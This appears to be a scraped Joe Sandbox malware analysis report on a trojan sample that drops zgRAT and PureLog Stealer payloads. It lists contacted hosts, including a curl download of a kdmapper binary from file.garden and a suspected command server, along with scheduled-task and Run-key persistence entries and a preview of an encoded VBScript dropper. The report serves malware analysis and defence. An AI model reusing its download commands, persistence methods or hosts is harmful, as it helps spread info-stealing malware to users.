                                                                                                                      http://crl.micpowershell.exe, 00000020.00000002.1969358434.00000251FE250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://steamcommunity.com/iRegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://recaptcha.netRegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://store.steampowered.com/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://sketchfab.comRegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://lv.queniujq.cnRegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://steamcommunity.com/profiles/76561199724331900SRegAsm.exe, 0000000C.00000002.1538668307.0000000001304000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                              unknown
                                                                                                                              https://www.youtube.com/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://127.0.0.1:27060RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enRegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:curl.exe, 00000004.00000002.1492818711.0000019B0A2A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.houseindustries.com/licenseCopyrightseoI30IZZr.exefalse
                                                                                                                                          unknown
                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTgRegAsm.exe, 0000000C.00000002.1538540291.00000000012FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishRegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001F.00000002.1759033398.000001D6A04A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://www.google.com/recaptcha/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://checkout.steampowered.com/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishRegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://help.steampowered.com/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.steampowered.com/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://surveriysiop.shop/apiRegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://aka.ms/pscore68powershell.exe, 0000001F.00000002.1759033398.000001D6A0281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E5DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://steamcommunity.com/RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://store.steampowered.com/;RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  188.114.96.3
                                                                                                                                                  file.gardenEuropean Union
                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                  104.102.49.254
                                                                                                                                                  steamcommunity.comUnited States
                                                                                                                                                  16625AKAMAI-ASUSfalse
                                                                                                                                                  IP
                                                                                                                                                  127.0.0.1
                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1522824
                                                                                                                                                  Start date and time:2024-09-30 18:18:07 +02:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 12m 0s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:72
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:seoI30IZZr.exe
                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                  Original Sample Name:26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.spre.troj.expl.evad.winEXE@80/50@21/3
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 33.3%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 52%
                                                                                                                                                  • Number of executed functions: 12
                                                                                                                                                  • Number of non-executed functions: 122
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, schtasks.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Execution Graph export aborted for target WmiPrvSE.exe, PID 3484 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target WmiPrvSE.exe, PID 5656 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target msedge.exe, PID 1836 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target msedge.exe, PID 1856 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target msedge.exe, PID 4900 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target msedge.exe, PID 7140 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 3848 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6864 because it is empty
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  • VT rate limit hit for: seoI30IZZr.exe
                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  12:19:15API Interceptor3x Sleep call for process: RegAsm.exe modified
                                                                                                                                                  12:19:34API Interceptor59x Sleep call for process: powershell.exe modified
                                                                                                                                                  12:19:57API Interceptor1x Sleep call for process: msedge.exe modified
                                                                                                                                                  18:19:32Task SchedulerRun new task: WmiPrvSE path: "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                                                                                                                                  18:19:32Task SchedulerRun new task: WmiPrvSEW path: "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                                                                                                                                  18:19:34Task SchedulerRun new task: msedge path: "C:\Edge\msedge.exe"
                                                                                                                                                  18:19:34Task SchedulerRun new task: msedgem path: "C:\Edge\msedge.exe"
                                                                                                                                                  18:19:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                                                                                                                                  18:19:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                  18:19:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                                                                                                                                  18:20:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                  18:20:13AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                                                                                                                                  18:20:21AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                  18:20:38AutostartRun: WinLogon Shell "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                                                                                                                                  18:20:46AutostartRun: WinLogon Shell "C:\Edge\msedge.exe"
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  188.114.96.3docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                                                                                                                  https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • wwvmicrosx.live/office365/office_cookies/main/
                                                                                                                                                  http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                                                                                                                  http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • mobilelegendsmycode.com/favicon.ico
                                                                                                                                                  http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                  • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                                                                                                                  ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.chinaen.org/zi4g/
                                                                                                                                                  http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                                                                                                                                                  • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                                                                                                                                                  Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • www.444317.com/
                                                                                                                                                  Sept order.docGet hashmaliciousFormBookBrowse
                                                                                                                                                  • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                                                                                                                                  1e#U0414.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                  • dddotx.shop/Mine/PWS/fre.php
                                                                                                                                                  104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                  • www.valvesoftware.com/legal.htm
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  steamcommunity.comfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  https://downcheck.nyc3.cdn.digitaloceanspaces.com/peltgon.zipGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  https://downcheck.nyc3.cdn.digitaloceanspaces.com/malt.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  CLOUDFLARENETUSdocs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.18.35.212
                                                                                                                                                  https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.22.52.71
                                                                                                                                                  https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 1.1.1.1
                                                                                                                                                  https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 172.67.148.87
                                                                                                                                                  http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.18.86.42
                                                                                                                                                  AKAMAI-ASUShttps://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.102.35.2
                                                                                                                                                  http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 173.223.116.167
                                                                                                                                                  Xkci1BfrmX.lnkGet hashmaliciousLonePageBrowse
                                                                                                                                                  • 23.56.162.185
                                                                                                                                                  Snc2ZNvAZP.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.56.162.185
                                                                                                                                                  Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.56.162.185
                                                                                                                                                  SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 96.17.64.189
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  74954a0c86284d0d6e1c4efefe92b521file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  Setup_10024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  U4hM4c3l4m.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  f1w58Se3jL.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  6EFA6YABDc.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  1ehTzqaTXV.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  Document.pdf.lnkGet hashmaliciousBitter ElephantBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  Transmission Cost Database 2.0.xlsbGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.102.49.254
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  C:\Users\user\Desktop\AznuGYbp.log0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                      p3f932IsTO.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                        UpU2O6YQxG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                          5WbBcHi91R.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                            4LU843t3Vt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                              ggJWCFp2S3.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                yQrCGtNgsf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                  qDlkXj5kcZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    C0laqZmkEf.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                      Process:C:\Edge\msedge.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (427), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):427
                                                                                                                                                                      Entropy (8bit):5.849378121744108
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:CedLScI8tv8yZ5BVzXdPkdtU4GQKPYHsrg:CetSD8t75BVpPUtU4qP9rg
                                                                                                                                                                      MD5:140D291237548913AE76416D89F273D0
                                                                                                                                                                      SHA1:9AC5FFE6834DEF7FAC5008E3EF88AD89C84D0383
                                                                                                                                                                      SHA-256:E451C9E799610ECFAEE17DA3A801022B32FF00251680A1DE7C5B31FD53229711
                                                                                                                                                                      SHA-512:A662D75F52A363F7537CE7A08B9686294DB04712F2321EB4AB797D2A25E75CA823FA3120ED5EA7ED6066A4C7B8C299AA819B898B33CBA4AA22D3ED2DBAB6B26E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:iOp9tgARqnowxDV6cyZ5J8KtoK3Y22L01pMXvuXcjR4oOrX926Aob6RjD5UjmmZycy5H18Lrb7V1Ege7x4f51hY4YmT0Zxz72FMavPH4vSNekZfhaXwsHe75aAsPoVSnHX98UEMhxlJiT4U8GwZCBH0XIR9uh1PaAkWMahNWKP5gVYlgqtJ25QlAhlzDEbA5VsishHijjD1wMUCupdDxsWeu9VpyrJRtO9Kmz38jLkT2YyyNjFXkXMM8NytMbt1ZvIhMKZ4wfelIDmVKgcPlwqVCwLZBJvIcs4GQRlCKKlF3lE5lcjp9eQnFwfa8A3mtWJaJfF35ZEaKlcasPxikGI8cRBdvLEKR9VhcowFXpujZzceUErsMVBnNK71elHtV4JLP58DdrK4WjinygJreV757sURq4lviBOfpRPZGoPe
                                                                                                                                                                      Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):229
                                                                                                                                                                      Entropy (8bit):5.838240404374592
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
                                                                                                                                                                      MD5:569A28CF34F3A51DB0CC4AA0369773EC
                                                                                                                                                                      SHA1:23488377EA3A37B61750952D541B867AB3D8B424
                                                                                                                                                                      SHA-256:86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
                                                                                                                                                                      SHA-512:3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      Preview:#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.
                                                                                                                                                                      Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                      Entropy (8bit):4.968079981014333
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
                                                                                                                                                                      MD5:68B1414DBD5A51F2F75912513D1A035E
                                                                                                                                                                      SHA1:A45E03F8EDADA7FDF3697EAA6D88785CD464D373
                                                                                                                                                                      SHA-256:48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
                                                                                                                                                                      SHA-512:AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%
                                                                                                                                                                      Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1963008
                                                                                                                                                                      Entropy (8bit):7.552676792704024
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                      MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                      SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                      SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                      SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 74%
